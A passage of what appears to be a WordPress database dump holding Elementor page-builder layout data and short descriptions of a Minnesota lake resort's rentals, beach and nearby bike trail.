cleaning house is a great place to gather and hear about where the fish are biting.<\\/p><p>We have a sandy beach with a playground, horeshoes, dock fishing, dockside gas and a private boat launch.<\\/p><p>The Resort is located right next to the Central Lakes Bike and Snowmobile Trail\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1984,768,'_wp_page_template','default'),(1985,768,'_elementor_edit_mode','builder'),(1986,768,'_elementor_template_type','post'),(1987,768,'_elementor_version','2.5.12'),(1988,768,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1989,768,'_elementor_data','[{\"id\":\"fc76464\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5536551\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"56364c2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f341f9e\"}]},\"elements\":[{\"id\":\"5e4caa1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e293a0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9d5e63\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"82ea2cc\"}]},\"elements\":[{\"id\":\"7e61b47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.24-PM.png\",\"id\":762}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2d498c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7b344a2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"049de3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e9a8e52\"}]},\"elements\":[{\"id\":\"69d7ea9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.35-PM.png\",\"id\":763}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f216db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2f3dfb8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ceb6001\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13dae5e\"}]},\"elements\":[{\"id\":\"fb96a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.01.55-PM.png\",\"id\":761}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2759c31\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d872028\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"33c9c25\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7c31972\"}]},\"elements\":[{\"id\":\"8b3f141\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d74147d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94515cc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e85e195\"}]},\"elements\":[{\"id\":\"5025a8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.06-PM.png\",\"id\":764}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b140f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a7fed3b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"193cbaa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4befc1e\"}]},\"elements\":[{\"id\":\"f317653\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.16-PM.png\",\"id\":765}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1ce41e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c556852\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5afa19a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4420cb\"}]},\"elements\":[{\"id\":\"adc26b8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.27-PM.png\",\"id\":767}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27fb6f7\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"68e5b19\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fdb7463\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5413439\"}]},\"elements\":[{\"id\":\"d959af0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bfaafa8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e22536\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8fe5ec3\"}]},\"elements\":[{\"id\":\"fcf0d1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To make your stay more fun, we have paddle boards, a paddle\\u00a0boat, kayaks, canoes, fishing boats and pontoon to rent.<\\/p><p>The fish cleaning house is a great place to gather and hear about where the fish are biting.<\\/p><p>We have a sandy beach with a playground, horeshoes, dock fishing, dockside gas and a private boat launch.<\\/p><p>The Resort is located right next to the Central Lakes Bike and Snowmobile Trail test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1992,769,'_wp_page_template','default'),(1993,769,'_elementor_edit_mode','builder'),(1994,769,'_elementor_template_type','post'),(1995,769,'_elementor_version','2.5.12'),(1996,769,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1997,769,'_elementor_data','[{\"id\":\"fc76464\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5536551\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"56364c2\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f341f9e\"}]},\"elements\":[{\"id\":\"5e4caa1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0e293a0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9d5e63\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"82ea2cc\"}]},\"elements\":[{\"id\":\"7e61b47\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.24-PM.png\",\"id\":762}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2d498c3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7b344a2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"049de3f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e9a8e52\"}]},\"elements\":[{\"id\":\"69d7ea9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.03.35-PM.png\",\"id\":763}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"f216db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2f3dfb8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ceb6001\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"13dae5e\"}]},\"elements\":[{\"id\":\"fb96a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.01.55-PM.png\",\"id\":761}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2759c31\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d872028\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"33c9c25\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"7c31972\"}]},\"elements\":[{\"id\":\"8b3f141\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d74147d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"94515cc\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e85e195\"}]},\"elements\":[{\"id\":\"5025a8f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.06-PM.png\",\"id\":764}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b140f97\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a7fed3b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"193cbaa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4befc1e\"}]},\"elements\":[{\"id\":\"f317653\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.16-PM.png\",\"id\":765}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1ce41e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c556852\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"5afa19a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4420cb\"}]},\"elements\":[{\"id\":\"adc26b8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.02.27-PM.png\",\"id\":767}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27fb6f7\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"68e5b19\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fdb7463\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5413439\"}]},\"elements\":[{\"id\":\"d959af0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bfaafa8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2e22536\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8fe5ec3\"}]},\"elements\":[{\"id\":\"fcf0d1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>To make your stay more fun, we have paddle boards, a paddle\\u00a0boat, kayaks, canoes, fishing boats and pontoon to rent.<\\/p><p>The fish cleaning house is a great place to gather and hear about where the fish are biting.<\\/p><p>We have a sandy beach with a playground, horeshoes, dock fishing, dockside gas and a private boat launch.<\\/p><p>The Resort is located right next to the Central Lakes Bike and Snowmobile Trail\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1999,64,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2000,770,'_wp_page_template','default'),(2001,770,'_elementor_edit_mode','builder'),(2002,770,'_elementor_data','[{\"id\":\"f9e96ab\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"db3737b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"00a00e3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1d5f478\"}]},\"elements\":[{\"id\":\"432c91d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b0f7bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63b0366\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4eb8e34\"}]},\"elements\":[{\"id\":\"7c317a6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2718.jpg\",\"id\":179}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bbac0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73084eb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"06d8a07\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"24d056a\"}]},\"elements\":[{\"id\":\"f22430a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2974.jpg\",\"id\":181}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84e7620\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"779c4aa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"83ff3fa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5589494\"}]},\"elements\":[{\"id\":\"2e41308\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2735.jpg\",\"id\":180}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8b71bdf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a49cb9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c3aa031\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c260443\"}]},\"elements\":[{\"id\":\"0a50016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3007.jpg\",\"id\":182}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c4cd5d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1706dc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0cdfb3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f20dd03\"}]},\"elements\":[{\"id\":\"6da7d1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"61061cf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3e077e8\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ee05ec\"}]},\"elements\":[{\"id\":\"c101f05\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>Our Resort is right next to the <a href=\\\"http:\\/\\/centrallakestrail.com\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Central Lakes Trail <\\/a><\\/h3><p>You can ride 18 miles from the resort to Fergus Falls or 82 miles to St. Joseph by catching the Lake Wobegon Trail.<\\/p><h3>Bring Your Bike the trail is very scenic and level for all ages to enjoy. test<\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2003,770,'_elementor_version','0.4'),(2004,770,'_elementor_template_type','post'),(2006,770,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2008,771,'_wp_page_template','default'),(2009,771,'_elementor_edit_mode','builder'),(2010,771,'_elementor_data','[{\"id\":\"f9e96ab\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"db3737b\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"00a00e3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1d5f478\"}]},\"elements\":[{\"id\":\"432c91d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8b0f7bd\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"63b0366\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4eb8e34\"}]},\"elements\":[{\"id\":\"7c317a6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2718.jpg\",\"id\":179}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bbac0a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73084eb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"06d8a07\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"24d056a\"}]},\"elements\":[{\"id\":\"f22430a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2974.jpg\",\"id\":181}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84e7620\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"779c4aa\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"83ff3fa\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"5589494\"}]},\"elements\":[{\"id\":\"2e41308\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2735.jpg\",\"id\":180}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8b71bdf\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1a49cb9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c3aa031\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c260443\"}]},\"elements\":[{\"id\":\"0a50016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN3007.jpg\",\"id\":182}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0c4cd5d\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e1706dc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0cdfb3a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f20dd03\"}]},\"elements\":[{\"id\":\"6da7d1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"61061cf\"},{\"eae_ani